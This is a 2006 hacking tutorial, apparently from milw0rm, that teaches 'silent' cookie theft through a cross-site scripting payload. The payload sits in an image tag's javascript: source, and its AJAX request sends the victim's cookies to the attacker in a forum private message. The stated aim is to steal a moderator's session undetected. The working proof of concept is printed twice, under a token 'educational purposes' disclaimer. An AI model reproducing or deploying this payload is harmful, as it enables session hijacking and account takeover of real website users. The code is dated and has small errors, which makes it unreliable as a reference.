Cookie Stealing Upgrade: Ajax Style

                     ~~~~Cookie Stealing Upgrade: Ajax Style~~~~
                    

                     Author: AJP
                     Aim: unlimitedorb, MSN: unlimtedorb@yahoo.com
                     Email: unlimitedorb@yahoo.com
                     Proof of Concept Code is provided at the end.
                     12/30/2006 


                             /*        Preface        */
                              *-----------------------*
                              *    This tutorial      *
                              * Will assume that you  *
                              * Have an understanding *
                              * of cookie stealers in *
                              * general and want to   *
                              * make your technique   *
                              * much more silent      *
                              * and effective through *
                              * the use of AJAX ie;   *
                              *     ABSOLUTELY NO     *
                              * Page Refreshes Allowed*
                             /*************************/


Note: THIS IS INTENDED FOR EDUCATIONAL PURPOSES AND THE AUTHOR IS NOT RESPONSIBLE FOR WHAT THE GENERAL COMMUNITY USES THIS FOR.


                                  __Introduction__

  For those of you that have been living under a good and solid rock lately, AJAX is 
revolutionizing the way the web works in the fact that it brings desktop-like functionality 
straight to the web in the form of Javascript and XML (For this tutorial, a working knowledge 
of XML is not needed.) In other words, AJAX (Asynchronous Javascript and XML) gets rid of pesky 
page refreshes and coupled with DHTML effects, can lead to quite interesting desktop-like web 
apps. AJAX is not 1 technology, but rather it's a collection of technologies that when used 
together provide a powerful framework. This Article/Tutorial will attempt to teach you how to 
harness this power to develop a very powerful cookie stealer. It's a great introduction to AJAX 
as well since it uses it in a unique and fun way. Before you use this tutorial, you must 
realize that AJAX is only useful specifically as a cookie stealer if it bypasses Cross-Domain 
policies. In order for this to work, the target site must have some sort of private messaging 
system in place to receive the cookies themselves. This will effectively bypass all 
verification that the browser needs in order to send the request.


                     __Cookie Stealing with AJAX? What's the point!__

  You may find yourself wondering how this could possibly help you generate a much more 
stealthy cookie stealer. Well, if you still don't understand then i'll take a moment to 
explain why and how this leads to the generation of a highly effective cookie stealer on 
steroids. To begin with, the property that is much sought after with AJAX is its ability to 
send arbitrary requests to a server in the form of an XMLHttpRequest. Essentially, it's 
possible to send such requests through the use of hyptertext links and/or various submit 
devices employed within web pages etc. But through the use of AJAX, once a user clicks on such 
a link as described above, the request is automatically sent to the server for processing 
without the need to redirect the user to another web page. This destroys the need for a page 
refresh, and thus gives the end user the ultimate in web functionality. All this is possible 
assuming that a web browser is augmented with a javascript interpreter of the right caliber 
(Most web browsers in use nowadays have this capability.) So now let's think for a moment and 
apply what we just learned to Cookie Stealing. A great majority of cookie stealers utilize 
javascript's Location method e.g; window.document.location="http://www.cookiestealer.com/
crappystealer.php". This will upon execution redirect the end user to a different page entirely 
than what was requested. Go ahead and try it out using javascript urls (or inline javascript if 
you rather) javascript: window.document.location="http://www.siteiwanttoberedirectedto.com"; 
This is the OLD way of cookie stealing, this article will get you up to date on how to redirect 
the end user to the web page of your choice (in this case a cookie stealer) through the 
employment of AJAX. Sometimes attackers will get creative with their cookie stealer (The OLD 
type) and make the page look exactly as the page that was previously requested. But guess what? 
Many users nowadays get suspicious when they see a web url that's not the domain they started 
with and on top of that looks something rather similar to http://pwnyougood.com/
stealstuff.php. Once they see this, chances are the incident will be reported and the web 
administration team/individual will realize the heist for what it is and patch the problem (In 
a perfect world of course ;) Using AJAX, you can append the users cookies to a silent request 
and send it wherever your heart desires (There can be some penalties with this, but we will 
discuss what they are and how to work around them later on.) Final result: user visits 
something like a forum...and that's it, mission accomplished and cookie is stolen. Nothing 
seems to happen, at least on the surface ;)


                      __I'm hooked, Now how do I get started?__

  After such a long winded introduction it's now time to get to the code itself and jump in 
head first. For our purposes we will make AJAX compatible with the 2 major browsers (At the 
time of this writing) Mozilla and Microsoft Internet Explorer. You will need some sort of Http 
Debugger, Paros Proxy or Microsoft Fiddler will suffice. This will be used to track requests 
later on, it is not required but highly useful.

IMPORTANT NOTE: This tutorial will utilize a common vector of attack (Cross Site Scripting) 
for Proof of Concept code, We will be manipulating the SRC attribute of the <img> tag in HTML 
to do our dirty work. The underlying code foundation can be easily modified to suit your needs 
provided you have a basic understanding of coding. The full code including a basic cookie 
stealer will be provided at the end of the tutorial.


                              __Tomorrow Never Dies__

//Begin of Sneaky Background Music
  Your Mission: Infiltrate a poorly made php-driven web forum that does not filter image 
signatures for javascript or other malicious code. Obtain a Moderators cookie without him/her 
or anyone knowing it was taken, and report back to base. I grant you permission to pick up hot 
ladies on the way ;)
//End of Sneaky Background Music


  Let us kick start our journey by using a harmless image tag to house our javascript urls in 
the SRC (A common form of XSS.)



<img src="javascript: 
//We will set XMLHttpRequestObject false to see if it returns true later on.
var XMLHTTPRequestObject = false;
if (window.XMLHttpRequest)
{
  XMLHttpRequestObject = new XMLHttpRequest();
}
else if(window.ActiveXObject)
{
  XMLHttpRequestObject = new ActiveXObject("Microsoft.XMLHTTP");
}
else
{
  alert("Javascript must be enabled to continue.");
}




  The above code is a simple test to confirm that an XMLHttpRequest Object can be generated. 
If not, the code will return false and an alert will popup saying that javascript must be 
enabled before continuing. Now that we have succesfully generated our new Object, it is time to 
create a function that will send a request to the server upon the body itself successfully 
loading. But we have a problem here...When AJAX tries to access a foreign site. Usually, the 
browser will protest with a confirmation message on whether or not the user wants to allow 
this access...well that defeats the purpose! We need to get rid of this protest if we want to 
make sure that our code is silent and deadly. Luckily, our mission was to do this for a forum, 
and usually forums will have some sort of private messaging system in place. So let's use the 
site against itself and send our cookies in the form of a message. Not only will this save us 
the hassle of making a file in php to retrieve the cookies and open a file to write them to, 
but it will also allow easy access and free storage and to ice the cake, we have also bypassed 
restrictions placed on accessing foreign sites. Now who can argue with that? =)





function socket()
{
/*The line below is very important. Notice that the Cookie is appended as a concentenated 
string? If the site is using a POST method to send messages then you will have to modify the 
code as well as fire up your HTTP debugger to make the necessary modifications.*/
XMLHttpRequestObject.open('GET', 'http://www.site.com/privatemessage.php user=yourusername&subject=' + window.document.cookie, true);
  XMLHttpRequestObject.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  XMLHttpRequestObject.send(null);
//Out of the Goodness of our heart =p
  delete XMLHttpRequestObject;
}
//Don't forget this is an image and close the image tag!
window.document.onload='socket();'">


                                 __Conclusion__

  Well there you have it folks, a simple yet extremely effective form of Cookie Stealing 
utilizing AJAX. The code provided is only an example and is in no way meant to be a one size 
fits all type thing. For instance, what if the private messaging system used POST instead of 
GET, or what if you really wanted to use an image and not have it broken? This tutorial should 
get you started on developing your devilishly silent scripts. So all in all you should at least 
be familiar with the concept of stealing cookies without page refreshes and how great a risk 
this imposes upon poorly secured websites. This is extremely hard to track if implemented in 
the right way. I hope you enjoyed this tutorial as much as I did in writing it and I also hope 
I achieved my intention of explaining without spoon-feeding. I hope this isn't a crutch, but 
at the same time I hope it helps you in whatever journey you ultimately choose. An interesting 
story that deals with how a person coupled Cross Site Scripting with Cross Site Request Forgery 
to carry out his attacks is the samy worm story. If you take a look at the original code used 
in the story you should be able to see that the code utilized AJAX to execute.


                              __Proof of Concept__
<img src="javascript: 
//We will set XMLHttpRequestObject false to see if it returns true later on.
var XMLHTTPRequestObject = false;
if (window.XMLHttpRequest)
{
  XMLHttpRequestObject = new XMLHttpRequest();
}
else if(window.ActiveXObject)
{
  XMLHttpRequestObject = new ActiveXObject("Microsoft.XMLHTTP");
}
else
{
  alert("Javascript must be enabled to continue.");
}
function socket()
{
//The line below is very important. Notice that the Cookie is appended as a concentenated 
string?
  XMLHttpRequestObject.open('GET', 'http://www.site.com/privatemessage.php?
user=yourusername&subject=' + window.document.cookie, true);
  XMLHttpRequestObject.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  XMLHttpRequestObject.send(null);
//Out of the Goodness of our heart =p
  delete XMLHttpRequestObject;
}
//Don't forget this is an image and close the image tag!
window.document.onload='socket();'">




                                 __Afterthought__

  One thing that tends to make every fiber of my being seethe with anger is labels. To label a 
person is to label how someone lives. How they wake up each day and go to bed every single 
night. In the act of labeling you are weakening an entity, making sure that no matter how hard 
it tries, it will never be anything more than what it already is. Please don't label people or 
what they stand for...Even if you laugh at my advice and consider it ridiculous, then I 
honestly hope the one thing you don't ever label is...yourself.




                               ~AJP (Peace. Out.)

# milw0rm.com [2006-12-31]